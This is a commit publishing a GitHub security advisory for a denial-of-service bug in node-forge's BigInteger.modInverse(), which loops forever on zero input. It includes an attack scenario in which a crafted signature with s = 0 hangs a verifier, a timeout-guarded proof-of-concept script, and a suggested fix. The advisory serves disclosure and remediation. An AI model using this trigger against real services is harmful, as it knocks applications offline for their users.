Publish GHSA-5m6q-g25r-mvwx

advisory-database[bot] · advisory-database[bot] · commit b9604fee1bc7 · 2026-03-26T21:59:31.000Z
diff --git a/advisories/github-reviewed/2026/03/GHSA-5m6q-g25r-mvwx/GHSA-5m6q-g25r-mvwx.json b/advisories/github-reviewed/2026/03/GHSA-5m6q-g25r-mvwx/GHSA-5m6q-g25r-mvwx.json
@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5m6q-g25r-mvwx",
+  "modified": "2026-03-26T21:57:49Z",
+  "published": "2026-03-26T21:57:48Z",
+  "aliases": [
+    "CVE-2026-33891"
+  ],
+  "summary": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input",
+  "details": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n  // ... setup ...\n  // No check for this == 0\n  // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n'use strict';\nconst { spawnSync } = require('child_process');\n\nconst childCode = `\n  const forge = require('node-forge');\n  // jsbn may not be auto-loaded; try explicit require if needed\n  if (!forge.jsbn) {\n    try { require('node-forge/lib/jsbn'); } catch(e) {}\n  }\n  if (!forge.jsbn || !forge.jsbn.BigInteger) {\n    console.error('ERROR: forge.jsbn.BigInteger not available');\n    process.exit(2);\n  }\n  const BigInteger = forge.jsbn.BigInteger;\n  const zero = new BigInteger('0', 10);\n  const mod = new BigInteger('3', 10);\n  // This call should throw or return 0, but instead loops forever\n  const inv = zero.modInverse(mod);\n  console.log('returned: ' + inv.toString());\n`;\n\nconsole.log('[*] Testing: BigInteger(0).modInverse(3)');\nconsole.log('[*] Expected: throw an error or return quickly');\nconsole.log('[*] Spawning child process with 5s timeout...');\nconsole.log();\n\nconst result = spawnSync(process.execPath, ['-e', childCode], {\n  encoding: 'utf8',\n  timeout: 5000,\n});\n\nif (result.error && result.error.code === 'ETIMEDOUT') {\n  console.log('[VULNERABLE] Child process timed out after 5s');\n  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');\n  process.exit(0);\n}\n\nif (result.status === 2) {\n  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());\n  console.log('  -> Check your node-forge installation');\n  process.exit(1);\n}\n\nif (result.status === 0) {\n  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());\n  process.exit(1);\n}\n\nconsole.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');\nif (result.stderr) console.log('  stderr:', result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n  var ac = m.isEven();\n  // Add this check:\n  if (this.signum() == 0) {\n    throw new Error('BigInteger has no modular inverse: input is zero');\n  }\n  // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "node-forge"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.4.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/digitalbazaar/forge"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-835"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-26T21:57:48Z",
+    "nvd_published_at": null
+  }
+}
